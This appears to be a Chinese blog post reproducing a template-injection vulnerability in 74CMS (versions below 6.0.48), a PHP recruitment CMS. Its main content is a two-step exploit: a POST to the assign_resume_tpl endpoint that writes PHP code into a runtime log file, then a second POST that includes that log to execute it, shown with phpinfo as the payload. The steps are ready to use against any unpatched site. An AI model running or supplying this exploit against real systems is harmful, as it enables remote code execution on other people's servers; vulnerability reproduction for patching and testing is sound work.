骑士cms人才系统,是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。
该漏洞影响版本: CMS < 6.0.48
漏洞复现
url:
http://目标IP地址/index.php?m=home&a=assign_resume_tpl
以post方式提交如下参数:
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
url:
http://目标IP地址/index.php?m=home&a=assign_resume_tpl
以post方式提交如下参数:
variable=1&tpl=data/Runtime/Logs/Home/22_04_15.log(注:该生成的日志文件为你的当前时间+.log)
如果觉得《74CMS模版注入漏洞复现》对你有帮助,请点赞、收藏,并留下你的观点哦!